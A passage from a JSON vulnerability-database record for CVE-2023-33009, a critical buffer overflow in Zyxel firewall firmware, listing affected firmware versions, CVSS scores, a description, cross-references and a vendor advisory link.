                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "cve": "CVE-2023-33009",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security@zyxel.com.tw",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2023-007635",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-33009",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2023-33009",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2023-007635",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202305-2094",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A buffer overflow vulnerability in the notification function in Zyxel ATP series firmware versions 4.60 through 5.36 Patch 1, USG FLEX series firmware versions 4.60 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.60 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.60 through 5.36 Patch 1, VPN series firmware versions 4.60 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.60 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device. ATP100 firmware, ATP200 firmware, ATP500 firmware etc. ZyXEL The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-33009"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-33009",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-33009",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-33009"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "id": "VAR-202305-2121",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2024-04-03T22:50:49.469000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ATP Security vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=240582"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2094"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-buffer-overflow-vulnerabilities-of-firewalls"
          },
          {
            "trust": 0.8,
